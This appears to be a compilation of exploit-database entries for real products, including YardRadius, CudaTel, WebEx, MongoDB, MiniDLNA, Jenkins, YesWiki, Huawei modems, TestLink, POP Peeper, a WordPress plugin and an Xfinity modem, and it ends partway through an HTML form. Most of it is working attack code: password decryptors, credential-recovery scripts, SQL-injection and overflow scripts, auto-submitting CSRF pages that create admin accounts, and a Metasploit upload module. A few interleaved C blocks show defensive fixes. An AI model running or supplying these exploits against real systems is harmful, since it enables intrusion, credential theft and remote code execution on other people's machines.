source: https://www.securityfocus.com/bid/61356/info
YardRadius is prone to multiple local format-string vulnerabilities.
Local attackers can leverage these issues to cause denial-of-service conditions. Due to the nature of these issues, arbitrary code execution within the context of the vulnerable application may also be possible.
YardRadius 1.1.2-4 is vulnerable; other versions may also be affected.
The following proof-of-concept is available:
ln -s radiusd %x
./%x -v
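As an added illustration (not YardRadius source, whose affected functions the advisory does not name): the PoC above works because argv[0] is whatever name the binary was invoked under, which a symlink fully controls, and that name reaches a printf-family call as its format string. The vulnerable and the safe shape side by side, plus a small check that flags names carrying directives; all names here are this example's own.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

/* Vulnerable shape: a logging helper whose first parameter is the FORMAT,
 * and the caller passes the untrusted program name straight into it.
 * With argv[0] == "%x" the directives are interpreted and read the stack.
 * Kept only for comparison; never call it with untrusted input. */
static void log_vuln(const char *fmt, ...)
{
    va_list ap;
    va_start(ap, fmt);
    vfprintf(stderr, fmt, ap);
    va_end(ap);
}

void print_version_vuln(const char *prog)
{
    log_vuln(prog);                    /* prog is the format string: the bug */
    log_vuln(": version 1.1.2\n");
}

/* Safe shape: the format is a constant and the name is a "%s" argument,
 * so "%x" in the name is emitted as the two characters '%' and 'x'. */
int format_version_safe(const char *prog, char *out, size_t outlen)
{
    return snprintf(out, outlen, "%s: version 1.1.2", prog);
}

/* Defensive check for review or a runtime assertion: a string that is
 * meant to be data must never be accepted where a format is expected. */
int has_format_directive(const char *s)
{
    return s != NULL && strchr(s, '%') != NULL;
}

int main(int argc, char **argv)
{
    char buf[256];
    const char *name = argc > 0 ? argv[0] : "radiusd";
    (void)format_version_safe(name, buf, sizeof buf);
    puts(buf);
    if (has_format_directive(name))
        puts("argv[0] carries printf directives; it must only ever be a %s argument");
    return 0;
}
```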
source: https://www.securityfocus.com/bid/61353/info
Barracuda CudaTel is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Barracuda CudaTel 2.6.02.04 is vulnerable; other versions may also be affected.
http://www.example.com/gui/route/route?%3C[CLIENT-SIDE SCRIPT CODE!]%20%3C
http://www.example.com/gui/route/route?_=1354073910062&bbx_outbound_route_flag_locked=%3C[CLIENT-SIDE SCRIPT CODE!]%20%3C
http://www.example.com/ajax-html/queues_wall_stub.html?_=1354074247075%20%3C[CLIENT-SIDE SCRIPT CODE!]%20%3C#
source: https://www.securityfocus.com/bid/61304/info
Cisco WebEx One-Click Client is prone to an information disclosure vulnerability.
Successful exploits may allow an attacker to disclose sensitive information such as stored passwords; this may aid in further attacks.
/*
WebEx One-Click Registry Key Decryptor
brad.antoniewicz@foundstone.coma
compile with: gcc -o webex-onedecrypt webex-onedecrypt.c -lcrypto
  (the AES_* routines live in libcrypto, and the library must follow the source file on the command line)
Thanks to https://code.google.com/p/tps-cripto-itba/source/browse/trunk/src/criptography
for making life easy
see comments below
*/
#include <openssl/aes.h>
#include <string.h>
#include <stdlib.h>
#include <stdio.h>

/*
AES-256 in OFB mode. OFB XORs the data with a keystream derived only from
key and IV, so encryption and decryption are the same operation and both
use the *encryption* key schedule. The caller frees the returned buffer.
*/
unsigned char *
aes_ofb_encrypt(const unsigned char *text, int length, const unsigned char *key, const unsigned char *iv)
{
    unsigned char *outbuf = calloc(1, length);
    int num = 0;
    unsigned char liv[16];
    AES_KEY aeskey;
    if (outbuf == NULL)
        return NULL;
    memcpy(liv, iv, 16);   /* work on a copy: AES_ofb128_encrypt advances the IV in place */
    AES_set_encrypt_key(key, 256, &aeskey);
    AES_ofb128_encrypt(text, outbuf, length, &aeskey, liv, &num);
    return outbuf;
}

unsigned char *
aes_ofb_decrypt(const unsigned char *enc, int length, const unsigned char *key, const unsigned char *iv)
{
    /* identical to encryption in OFB mode (same keystream, same XOR) */
    return aes_ofb_encrypt(enc, length, key, iv);
}

int main(void) {
    /*
    This value is from
    HKEY_CURRENT_USER\Software\WebEx\ProdTools\Password
    */
    const unsigned char regVal[] = "\xcc\x6d\xc9\x3b\xa0\xcc\x4c\x76\x55\xc9\x3b\x9f";
    /*
    This value is from
    HKEY_CURRENT_USER\Software\WebEx\ProdTools\PasswordLen
    */
    int regLength = 12;
    /*
    This value is a combination of these two registry keys:
    HKEY_CURRENT_USER\Software\WebEx\ProdTools\UserName
    HKEY_CURRENT_USER\Software\WebEx\ProdTools\SiteName
    Basically the username and the sitename padded to 32 characters; if the
    two don't add up to 32 characters, the string is just repeated until it fits.
    */
    unsigned char key[32] = "braantonsiteaa.webex.com/siteaab";
    /*
    The IV is static, particularly complex value of 123456789abcdef....
    */
    unsigned char iv[16] = { 0x12, 0x34, 0x56, 0x78, 0x9a, 0xbc, 0xde, 0xf0, 0x34, 0x56, 0x78, 0x9a, 0xbc, 0xde, 0xf0, 0x12 };
    /*
    These are just for testing, you'd probably not have the password :)
    */
    const unsigned char *password = (const unsigned char *)"bradbradbrad";
    int pwLength = (int)strlen((const char *)password);
    unsigned char *enc = NULL;
    unsigned char *enc2 = NULL;
    int i = 0;

    printf("Reg Key Value = ");
    enc = aes_ofb_encrypt(password, pwLength, key, iv);
    if (enc == NULL)
        return 1;
    for (i = 0; i < pwLength; i++) {
        printf("%02x ", enc[i]);
    }
    printf("\n");

    printf("Password = ");
    enc2 = aes_ofb_decrypt(regVal, regLength, key, iv);
    if (enc2 == NULL)
        return 1;
    for (i = 0; i < regLength; i++) {
        printf("%c", enc2[i]);
    }
    printf("\n");

    free(enc);
    free(enc2);
    return 0;
}
source: https://www.securityfocus.com/bid/61309/info
MongoDB is prone to a remote code execution vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit this vulnerability to execute arbitrary code within the context of the affected application.
MongoDB 2.4.4 is vulnerable; other versions may also be affected.
use databaseMapped
sizechunk=0x1338; chunk=""; for(i=0;i<sizechunk;i++){ chunk+="\x05\x7c\x77\x55\x08\x04\x00\x00"; } for(i=0;i<30000;i++){ db.my_collection.insert({my_chunk:chunk}) }
db.eval('Mongo.prototype.find("a",{"b":"c"},"d","e","f","g","h")');
source: https://www.securityfocus.com/bid/61282/info
ReadyMedia is prone to a remote heap-based buffer-overflow vulnerability.
Attackers can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition.
ReadyMedia versions prior to 1.1.0 are vulnerable.
#!/usr/bin/env python
#AAAAinject.py
# Author: Zachary Cutlip
# zcutlip@tacnetsol.com
# twitter: @zcutlip
#This script injects a buffer overflow into the ALBUM_ART table of
#MiniDLNA's SQLite database. When queried with the proper soap request,
#this buffer overflow demonstrates arbitrary code execution by placing a
#string of user-controlled 'A's in the CPU's program counter. This
#affects MiniDLNA version 1.0.18 as shipped with Netgear WNDR3700 version 3.
import math
import sys
import urllib,socket,os,httplib
import time
headers={"Host":"10.10.10.1"}
host="10.10.10.1"
COUNT=8
LEN=128
empty=''
overflow_strings=[]
overflow_strings.append("AA")
overflow_strings.append("A"*LEN)
overflow_strings.append("B"*LEN)
overflow_strings.append("C"*LEN)
overflow_strings.append("D"*LEN)
overflow_strings.append("A"*LEN)
overflow_strings.append("\x10\x21\x76\x15"*(LEN/4))
overflow_strings.append("\x10\x21\x76\x15"*(LEN/4))
overflow_strings.append("D"*LEN)
overflow_strings.append("D"*LEN)
overflow_strings.append("D"*LEN)
# The text between these two pieces is spliced into an SQLite query by the
# server; "/**/" comment sequences stand in for spaces so the query survives
# URL path handling.
path_beginning='/AlbumArt/1;'
path_ending='-18.jpg'
details_insert_query='insert/**/into/**/DETAILS(ID,SIZE,TITLE,ARTIST,ALBUM'+\
',TRACK,DLNA_PN,MIME,ALBUM_ART,DISC)/**/VALUES("31337"'+\
',"PWNED","PWNED","PWNED","PWNED","PWNED","PWNED"'+\
',"PWNED","1","PWNED");'
objects_insert_query='insert/**/into/**/OBJECTS(OBJECT_ID,PARENT_ID,CLASS,DETAIL_ID)'+\
'/**/VALUES("PWNED","PWNED","container","31337");'
details_delete_query='delete/**/from/**/DETAILS/**/where/**/ID="31337";'
objects_delete_query='delete/**/from/**/OBJECTS/**/where/**/OBJECT_ID="PWNED";'
def build_injection_req(query):
    request=path_beginning+query+path_ending
    return request
def do_get_request(request):
    conn=httplib.HTTPConnection(host,8200)
    conn.request("GET",request,"",headers)
    conn.close()
def build_update_query(string):
    # each call appends another chunk to the ALBUM_ART column of row 31337
    details_update_query='update/**/DETAILS/**/set/**/ALBUM_ART=ALBUM_ART'+\
    '||"'+string+'"/**/where/**/ID="31337";'
    return details_update_query
def clear_overflow_data():
    print "Deleting existing overflow data..."
    request=build_injection_req(details_delete_query)
    do_get_request(request)
    request=build_injection_req(objects_delete_query)
    do_get_request(request)
    time.sleep(1)
def insert_overflow_data():
    print("Setting up initial database records....")
    request=build_injection_req(objects_insert_query)
    do_get_request(request)
    request=build_injection_req(details_insert_query)
    do_get_request(request)
    print("Building long ALBUM_ART string.")
    for string in overflow_strings:
        req=build_injection_req(build_update_query(string))
        do_get_request(req)
clear_overflow_data()
insert_overflow_data()
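An added, defender-side example that is not MiniDLNA code: the request paths in this script work because the text between /AlbumArt/ and .jpg reaches the SQLite query as-is. A strict parser that accepts only the `<id>-<detail>.jpg` shape and hands back integers (to be bound as query parameters rather than spliced into SQL text) rejects every injection path above; function and macro names are this example's own.

```c
#include <ctype.h>
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define ALBUM_ART_PREFIX "/AlbumArt/"
#define ALBUM_ART_SUFFIX ".jpg"

/* Parse "/AlbumArt/<art_id>-<detail_id>.jpg" into two non-negative ids.
 * Returns 0 on success, -1 for any path that deviates from that exact
 * shape: extra characters, a sign, whitespace, or the ';...' SQL tail the
 * exploit above relies on. Both ids are then safe to bind as integer
 * parameters (sqlite3_bind_int64) instead of being formatted into SQL. */
int parse_album_art_path(const char *path, long *art_id, long *detail_id)
{
    const size_t plen = strlen(ALBUM_ART_PREFIX);
    const size_t slen = strlen(ALBUM_ART_SUFFIX);
    const char *p, *end;
    char *stop;
    size_t n;

    if (path == NULL || strncmp(path, ALBUM_ART_PREFIX, plen) != 0)
        return -1;
    n = strlen(path);
    if (n < plen + slen + 3 || strcmp(path + n - slen, ALBUM_ART_SUFFIX) != 0)
        return -1;                            /* need at least "d-d" + suffix */
    p = path + plen;
    end = path + n - slen;

    if (!isdigit((unsigned char)*p))          /* no sign, no blanks */
        return -1;
    errno = 0;
    *art_id = strtol(p, &stop, 10);
    if (errno == ERANGE || *stop != '-')      /* "1;insert..." stops at ';' */
        return -1;
    p = stop + 1;
    if (!isdigit((unsigned char)*p))
        return -1;
    *detail_id = strtol(p, &stop, 10);
    if (errno == ERANGE || stop != end)       /* nothing between id and .jpg */
        return -1;
    return 0;
}

int main(void)
{
    /* constructed sample paths: a legitimate request and the injection shape */
    const char *samples[] = {
        "/AlbumArt/1-18.jpg",
        "/AlbumArt/1;delete/**/from/**/DETAILS/**/where/**/ID=\"31337\";-18.jpg",
    };
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++) {
        long a, d;
        if (parse_album_art_path(samples[i], &a, &d) == 0)
            printf("ok     art=%ld detail=%ld  %s\n", a, d, samples[i]);
        else
            printf("REJECT %s\n", samples[i]);
    }
    return 0;
}
```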
source: https://www.securityfocus.com/bid/61196/info
Apache Struts is prone to multiple open-redirection vulnerabilities because the application fails to properly sanitize user-supplied input.
An attacker can leverage these issues by constructing a crafted URI and enticing a user to follow it. When an unsuspecting victim follows the link, they may be redirected to an attacker-controlled site; this may aid in phishing attacks. Other attacks are possible.
Apache Struts versions from 2.0.0 up to, but not including, 2.3.15.1 are vulnerable.
http://www.example.com/struts2-showcase/fileupload/upload.action?redirect:http://www.example.com/
http://www.example.com/struts2-showcase/modelDriven/modelDriven.action?redirectAction:http://www.example.com/%23
# Exploit Title: Jenkins Unauthenticated Credential Recovery
# Disclosure Date: 10/14/2015
# Response Date: 10/14/2015
# Response: "Recommend this be rejected as a vulnerability."
# Full report including response: http://www.th3r3p0.com/vulns/jenkins/jenkinsVuln.html
# Vendor Homepage: https://jenkins-ci.org/
# Tested on: Jenkins v1.633
# Author = 'Th3R3p0' | Justin Massey
# Google Dork: intitle:"Dashboard [Jenkins]" Credentials
import requests
import re
from BeautifulSoup import BeautifulSoup
import urllib
# Usage: Modify the URL below to match the target host and port
# Must have trailing slash at end of URL
url='http://192.168.1.151:8080/'
# makes request to gather all users with stored credentials
r= requests.get(url + 'credential-store/domain/_/')
soup = BeautifulSoup(r.text)
# loop to go through all hrefs and match the regex "credential" and add the urls to the users list
users = []
for link in soup.body.findAll('a', href=True):
    m = re.match("credential", link['href'])
    if m:
        if link['href'] not in users:
            users.append(link['href'])
for cred in users:
    r2 = requests.get(url + 'credential-store/domain/_/'+cred+'/update')
    soup2 = BeautifulSoup(r2.text)
    # Finds the user and password value in html and stores in encPass variable
    user = soup2.body.findAll(attrs={"name" : "_.username"})[0]['value']
    encPass = soup2.body.findAll(attrs={"name" : "_.password"})[0]['value']
    # Encodes the password to www-form-urlencoded standards needed for the expected content type
    encPassEncoded = urllib.quote(encPass, safe='')
    # Script to run in groovy scripting engine to decrypt the password
    script = 'script=hudson.util.Secret.decrypt+%%27' \
             '%s'\
             '%%27&json=%%7B%%22script%%22%%3A+%%22hudson.util.Secret.decrypt+%%27' \
             '%s' \
             '%%27%%22%%2C+%%22%%22%%3A+%%22%%22%%7D&Submit=Run' % (encPassEncoded, encPassEncoded)
    # Using sessions because the POST requires a session token to be present
    with requests.Session() as s:
        r3 = s.get(url+'script')
        headers = {'content-type': 'application/x-www-form-urlencoded'}
        r3 = s.post(url+'script',data=script, headers=headers)
    soup3 = BeautifulSoup(r3.text)
    # Extracts password from body
    password = soup3.body.findAll('pre')[1].text
    password = re.sub('Result:', '', password)
    print "User: %s | Password:%s" % (user, password)
# Exploit Title: YESWIKI 0.2 - Path Traversal (template param)
# Date: 2015-11-10
# Exploit Author: HaHwul
# Exploit Author Blog: http://www.codeblack.net
# Vendor Homepage: http://yeswiki.net
# Software Link: https://github.com/YesWiki/yeswiki
# Version: yeswiki 0.2
# Tested on: Debian [Wheezy] , Ubuntu
# CVE : none
# ===========================================
<!-- Open Browser: http://127.0.0.1/vul_test/yeswiki/wakka.php?wiki=HomePage/diaporama&template=/../../../../../../../../../../../../etc/passwd
--><br>
# Exploit Code<br>
# ===========================================
<br><br>
<form name="yeswiki_traversal2_poc" action="http://127.0.0.1/vul_test/yeswiki/wakka.php" method="GET">
<input type="hidden" name="wiki" value="HomePage/diaporama">
Target: Edit HTML Code<br>
File: <input type="text" name="template" value="/../../../../../../../../../../../../etc/passwd"><br>
<input type="submit" value="Exploit">
</form>
<!-- Auto Submit
<script type="text/javascript">document.forms.yeswiki_traversal2_poc.submit();</script>
-->
# Exploit Title: Huawei HG630a and HG630a-50 Default SSH Admin Password on Adsl Modems
# Date: 10.11.2015
# Exploit Author: Murat Sahin (@murtshn)
# Vendor Homepage: Huawei
# Version: HG630a and HG630a-50
# Tested on: linux,windows
ADSL modems force you to change the admin web interface password. Even though
you can change the admin password on the web interface, the password you
assign does not apply to SSH. So the SSH password will always be
'Username:admin Password:admin'.
Ex:
ssh admin@modemIP
admin@modemIP's password: admin
PTY allocation request failed on channel 0
-------------------------------
-----Welcome to ATP Cli------
-------------------------------
ATP>?
?
cls
debug
help
save
?
exit
ATP>shell
shell
BusyBox vv1.9.1 (2013-12-31 16:16:20 CST) built-in shell (ash)
Enter 'help' for a list of built-in commands.
# cat /proc/version
cat /proc/version
Linux version 2.6.30 (y00179387@localhost) (gcc version 4.4.2
(Buildroot 2010.02-git) ) #10 SMP PREEMPT Tue Dec 31 16:20:50 CST 2013
#
Source: https://code.google.com/p/google-security-research/issues/detail?id=614
The following heap-based out-of-bounds memory read has been encountered in FreeType. It has been reproduced with the current version of freetype2 from the master git branch, using a 64-bit build of the ftbench utility compiled with AddressSanitizer:
$ ftbench <file>
Attached are three POC files which trigger the conditions.
---
$ freetype2-demos/bin/ftbench asan_heap-oob_783b6f_6837_eb01136f859a0091cb61f7beccd7059b
ftbench results for font `asan_heap-oob_783b6f_6837_eb01136f859a0091cb61f7beccd7059b'
-------------------------------------------------------------------------------------
family: (null)
style: (null)
number of seconds for each test: 2.000000
starting glyph index: 0
face size: 10ppem
font preloading into memory: no
load flags: 0x0
render mode: 0
CFF engine set to Adobe
TrueType engine set to version 35
maximum cache size: 1024KiByte
executing tests:
Load =================================================================
==22366==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60200000eb55 at pc 0x00000069e2fc bp 0x7fffc4670610 sp 0x7fffc4670608
READ of size 1 at 0x60200000eb55 thread T0
#0 0x69e2fb in tt_sbit_decoder_load_bit_aligned freetype2/src/sfnt/ttsbit.c:834:19
#1 0x69d214 in tt_sbit_decoder_load_bitmap freetype2/src/sfnt/ttsbit.c:1145:15
#2 0x69b1bf in tt_sbit_decoder_load_image freetype2/src/sfnt/ttsbit.c:1340:12
#3 0x69eee2 in tt_sbit_decoder_load_compound freetype2/src/sfnt/ttsbit.c:932:15
#4 0x69d214 in tt_sbit_decoder_load_bitmap freetype2/src/sfnt/ttsbit.c:1145:15
#5 0x69b1bf in tt_sbit_decoder_load_image freetype2/src/sfnt/ttsbit.c:1340:12
#6 0x6893d2 in tt_face_load_sbit_image freetype2/src/sfnt/ttsbit.c:1506:19
#7 0x55d265 in load_sbit_image freetype2/src/truetype/ttgload.c:2127:13
#8 0x55bedc in TT_Load_Glyph freetype2/src/truetype/ttgload.c:2487:15
#9 0x5301a2 in tt_glyph_load freetype2/src/truetype/ttdriver.c:396:13
#10 0x4f18ae in FT_Load_Glyph freetype2/src/base/ftobjs.c:742:15
#11 0x4e966e in test_load freetype2-demos/src/ftbench.c:250:13
#12 0x4e9c3f in benchmark freetype2-demos/src/ftbench.c:216:15
#13 0x4e80e9 in main freetype2-demos/src/ftbench.c:1058:9
0x60200000eb55 is located 0 bytes to the right of 5-byte region [0x60200000eb50,0x60200000eb55)
allocated by thread T0 here:
#0 0x4bc4a8 in malloc llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:40
#1 0x756740 in ft_alloc freetype2/src/base/ftsystem.c:74:12
#2 0x51b4e7 in ft_mem_qalloc freetype2/src/base/ftutil.c:76:15
#3 0x51abb1 in FT_Stream_EnterFrame freetype2/src/base/ftstream.c:269:12
#4 0x51a800 in FT_Stream_ExtractFrame freetype2/src/base/ftstream.c:200:13
#5 0x69ccab in tt_sbit_decoder_load_bitmap freetype2/src/sfnt/ttsbit.c:1036:10
#6 0x69b1bf in tt_sbit_decoder_load_image freetype2/src/sfnt/ttsbit.c:1340:12
#7 0x69eee2 in tt_sbit_decoder_load_compound freetype2/src/sfnt/ttsbit.c:932:15
#8 0x69d214 in tt_sbit_decoder_load_bitmap freetype2/src/sfnt/ttsbit.c:1145:15
#9 0x69b1bf in tt_sbit_decoder_load_image freetype2/src/sfnt/ttsbit.c:1340:12
#10 0x6893d2 in tt_face_load_sbit_image freetype2/src/sfnt/ttsbit.c:1506:19
#11 0x55d265 in load_sbit_image freetype2/src/truetype/ttgload.c:2127:13
#12 0x55bedc in TT_Load_Glyph freetype2/src/truetype/ttgload.c:2487:15
#13 0x5301a2 in tt_glyph_load freetype2/src/truetype/ttdriver.c:396:13
#14 0x4f18ae in FT_Load_Glyph freetype2/src/base/ftobjs.c:742:15
#15 0x4e966e in test_load freetype2-demos/src/ftbench.c:250:13
#16 0x4e9c3f in benchmark freetype2-demos/src/ftbench.c:216:15
#17 0x4e80e9 in main freetype2-demos/src/ftbench.c:1058:9
SUMMARY: AddressSanitizer: heap-buffer-overflow freetype2/src/sfnt/ttsbit.c:834:19 in tt_sbit_decoder_load_bit_aligned
==22366==ABORTING
---
The issue was reported in https://savannah.nongnu.org/bugs/?46379.
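An added example, not FreeType's decoder: the report above is a one-byte read just past a 5-byte frame during bit-aligned embedded-bitmap decoding. A bit-aligned bitmap stores width*height*bpp bits contiguously with no per-row padding, so a safe decoder computes that size and checks it against the frame before reading anything; this block also decodes bpp of 1..8 rather than only the 1-bit case. Function names and the byte-per-pixel output layout are this example's own.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Bytes needed for a bit-aligned bitmap: width*height*bpp bits, rows packed
 * back to back with no padding, rounded up to whole bytes. Returns 0 for
 * dimensions outside what 16-bit strike metrics can describe or bpp outside
 * 1..8, so a crafted font cannot force a zero or overflowing size. */
size_t sbit_bit_aligned_bytes(uint32_t width, uint32_t height, uint32_t bpp)
{
    uint64_t bits;
    if (width == 0 || height == 0 || width > 0xFFFF || height > 0xFFFF)
        return 0;
    if (bpp < 1 || bpp > 8)
        return 0;
    bits = (uint64_t)width * height * bpp;        /* at most 2^35: no overflow */
    return (size_t)((bits + 7) / 8);
}

/* Decode the bitmap whose data starts at p into out[] (one byte per pixel,
 * row-major, MSB-first within each packed byte). limit is one past the end
 * of the frame handed to the decoder. Returns 0 on success, -1 when the
 * frame is shorter than the bitmap claims (the read ASan reported above)
 * or the output buffer cannot hold width*height pixels. */
int sbit_load_bit_aligned(const uint8_t *p, const uint8_t *limit,
                          uint32_t width, uint32_t height, uint32_t bpp,
                          uint8_t *out, size_t outlen)
{
    size_t need = sbit_bit_aligned_bytes(width, height, bpp);
    uint64_t npix = (uint64_t)width * height;
    uint64_t bitpos = 0;

    if (need == 0 || p == NULL || limit == NULL || limit < p)
        return -1;
    if ((size_t)(limit - p) < need)               /* the bound that must hold */
        return -1;
    if (npix > outlen)
        return -1;

    for (uint64_t i = 0; i < npix; i++) {
        uint32_t v = 0;
        for (uint32_t b = 0; b < bpp; b++, bitpos++)
            v = (v << 1) | ((p[bitpos >> 3] >> (7 - (bitpos & 7))) & 1u);
        out[i] = (uint8_t)v;
    }
    return 0;
}

int main(void)
{
    /* constructed 5-byte frame, the size of the region in the report */
    const uint8_t frame[5] = { 0xB4, 0x6C, 0x00, 0x00, 0x00 };
    uint8_t out[64];
    int rc = sbit_load_bit_aligned(frame, frame + sizeof frame, 8, 6, 1, out, sizeof out);
    printf("8x6x1 from 5 bytes: %s\n", rc == 0 ? "decoded" : "rejected (frame too short)");
    rc = sbit_load_bit_aligned(frame, frame + sizeof frame, 3, 2, 1, out, sizeof out);
    printf("3x2x1 from 5 bytes: %s\n", rc == 0 ? "decoded" : "rejected");
    return 0;
}
```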
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38662.zip
Information
=================================
Name: CSRF Vulnerability in TestLink 1.9.14
Affected Software: TestLink
Affected Versions: 1.9.14 and possibly below
Vendor Homepage: http://testlink.org/
Severity: High
Status: Fixed
Vulnerability Type:
=================================
Cross Site Request Forgery (CSRF)
CVE Reference:
=================================
Not assigned
Technical Details:
=================================
Even though CSRF tokens are implemented in the application, they are not
properly validated on the server side. This allows malicious requests
generated by the attacker to be processed by the server on behalf of the
victim. By exploiting the vulnerability, the attacker is able to create
user accounts with administrator privileges in the application.
Exploit Code
=================================
<html lang="en">
<head>
<title>CSRF Exploit to Create New Administrator Account</title>
</head>
<body>
<form action="http://localhost/testlink_1_9_14/lib/usermanagement/usersEdit.php"
id="formid" method="post">
<input type="hidden" name="CSRFName" value="" />
<input type="hidden" name="CSRFToken" value="" />
<input type="hidden" name="user_id" value="" />
<input type="hidden" name="user_login" value="" />
<input type="hidden" name="login" value="new_admin" />
<input type="hidden" name="firstName" value="new_administrator_fname" />
<input type="hidden" name="lastName" value="new_administrator_lname" />
<input type="hidden" name="password" value="new_administrator_password" />
<input type="hidden" name="emailAddress" value="new_administrator@admin.com" />
<input type="hidden" name="rights_id" value="8" />
<input type="hidden" name="locale" value="en_GB" />
<input type="hidden" name="authentication" value="" />
<input type="hidden" name="user_is_active" value="on" />
<input type="hidden" name="doAction" value="doCreate" />
<input type="hidden" name="do_update" value="Save" />
</form>
<script>
document.getElementById('formid').submit();
</script>
</body>
</html>
Exploitation Technique:
===================================
Remote
Severity Level:
===================================
High
Advisory Timeline
===================================
Sat, 7 Nov 2015 13:14:33 +0530 - First Contact
Sat, 7 Nov 2015 08:52:14 +0100 - Vendor Response
Sat, 7 Nov 2015 13:00:54 +0100 - Vendor Fixed
Sun, 8 Nov 2015 19:03:00 +0530 - Public Disclosure
Solution
====================================
This vulnerability is fixed in TestLink 1.9.15 (Tauriel)
Fix: https://github.com/TestLinkOpenSourceTRMS/testlink-code/commit/1cb1f78f1a50f6e6819bcbadeae345eb3213c487
Credits & Authors
====================================
Aravind C Ajayan, Balagopal N
'''
********************************************************************************************
# Exploit Title: POP Peeper SEH Over-write.
# Date: 9/14/2015
# Exploit Author: Un_N0n
# Software Link: http://www.esumsoft.com/download
# Version: v4.0.1
# Tested on: Windows 7 x86(32 BIT)
********************************************************************************************
[DUMP:]
'''
EAX 00000000
ECX 20203029
EDX 77C5660D ntdll.77C5660D
EBX 00000000
ESP 0012EC5C
EBP 0012EC7C
ESI 00000000
EDI 00000000
EIP 20203029
==============================
STACK:
0012FBF4 41414141
0012FBF8 41414141
0012FBFC 41414141
0012FC00 41414141
0012FC04 41414141
0012FC08 909020EB Pointer to next SE>
0012FC0C 20203029 SE handler
0012FC10 43434343
0012FC14 43434343
0012FC18 43434343
0012FC1C 43434343
0012FC20 43434343
0012FC24 43434343
0012FC28 43434343
===============================
'''
[Steps to Produce the Crash]:
1- Open 'POPPeeper.exe'
2- Go to Accounts->Add->CreateSingleAccount.
3- After entering the email address, the option for Account name will appear;
enter the contents of crash.txt in it->Save.
4- Then compose a new mail->In the TO field and Subject field, enter the contents of crash.txt
5- Save as Draft; the software will crash.
6- Open up "POPPeeper.exe" again.
7- Click on the Check Mail option; the software will crash.
Every time you click on Check Mail, it will crash as it will load the saved DRAFT.
[Code to produce CRASH.txt]
'''
buffer = "A"*66666
file = "crash.txt"
f = open(file,'w')
f.write(buffer)
f.close()
'''
[Extra Info:]
Offset : 2052
**********************************************************************************************
'''
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HTTP::Wordpress
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'            => 'Wordpress Ajax Load More PHP Upload Vulnerability',
      'Description'     => %q{
        This module exploits an arbitrary file upload in the WordPress Ajax Load More
        plugin version 2.8.1.1. It allows uploading arbitrary PHP files and getting
        remote code execution. This module has been tested successfully on WordPress
        Ajax Load More 2.8.0 with Wordpress 4.1.3 on Ubuntu 12.04/14.04 Server.
      },
      'Author'          =>
        [
          'Unknown', # Identify yourself || send a PR here
          'Roberto Soares Espreto <robertoespreto[at]gmail.com>' # Metasploit Module
        ],
      'License'         => MSF_LICENSE,
      'References'      =>
        [
          ['WPVDB', '8209']
        ],
      'Privileged'      => false,
      'Platform'        => 'php',
      'Arch'            => ARCH_PHP,
      'Targets'         => [['Ajax Load More 2.8.1.1', {}]],
      'DisclosureDate'  => 'Oct 10 2015',
      'DefaultTarget'   => 0
    ))

    register_options(
      [
        OptString.new('WP_USERNAME', [true, 'A valid username', nil]),
        OptString.new('WP_PASSWORD', [true, 'Valid password for the provided username', nil])
      ], self.class
    )
  end

  def check
    check_plugin_version_from_readme('ajax-load-more', '2.8.1.2')
  end

  def username
    datastore['WP_USERNAME']
  end

  def password
    datastore['WP_PASSWORD']
  end

  def get_nonce(cookie)
    res = send_request_cgi(
      'method'   => 'GET',
      'uri'      => normalize_uri(wordpress_url_backend, 'admin.php'),
      'vars_get' => {
        'page' => 'ajax-load-more-repeaters'
      },
      'cookie'   => cookie
    )

    if res && res.body && res.body =~ /php","alm_admin_nonce":"([a-z0-9]+)"}/
      return Regexp.last_match[1]
    else
      return nil
    end
  end

  def exploit
    vprint_status("#{peer} - Trying to login as #{username}")
    cookie = wordpress_login(username, password)
    fail_with(Failure::NoAccess, "#{peer} - Unable to login as: #{username}") if cookie.nil?

    vprint_status("#{peer} - Trying to get nonce")
    nonce = get_nonce(cookie)
    fail_with(Failure::Unknown, "#{peer} - Unable to get nonce") if nonce.nil?

    vprint_status("#{peer} - Trying to upload payload")

    # This must be default.php
    filename = 'default.php'

    print_status("#{peer} - Uploading payload")
    res = send_request_cgi(
      'method'    => 'POST',
      'uri'       => normalize_uri(wordpress_url_backend, 'admin-ajax.php'),
      'vars_post' => {
        'action'   => 'alm_save_repeater',
        'value'    => payload.encoded,
        'repeater' => 'default',
        'type'     => 'default',
        'alias'    => '',
        'nonce'    => nonce
      },
      'cookie'    => cookie
    )

    if res
      if res.code == 200 && res.body.include?('Template Saved Successfully')
        register_files_for_cleanup(filename)
      else
        fail_with(Failure::Unknown, "#{peer} - You do not have sufficient permissions to access this page.")
      end
    else
      fail_with(Failure::Unknown, 'Server did not respond in an expected way')
    end

    print_status("#{peer} - Calling uploaded file")
    send_request_cgi(
      'uri' => normalize_uri(wordpress_url_plugins, 'ajax-load-more', 'core', 'repeater', filename)
    )
  end
end
<!--
# Exploit Title: Unauthenticated Stored Xss
# Date: 11/6/15
# Exploit Author: Nu11By73
# Vendor Homepage: comcast.net and arrisi.com
# Version: eMTA & DOCSIS Software Version: 10.0.59.SIP.PC20.CT
Software Image Name:TG1682_2.0s7_PRODse
Advanced Services:TG1682G
Packet Cable:2.0
# Tested on: Default Install
-->
<html>
<p>Unauth Stored CSRF/XSS - Xfinity Modem</p>
<form method="POST" action="http://192.168.0.1/actionHandler/ajax_managed_services.php">
<input type="hidden" name="set" value="true" />
<input type="hidden" name="UMSStatus" value="Enabled" />
<input type="hidden" name="add" value="true" />
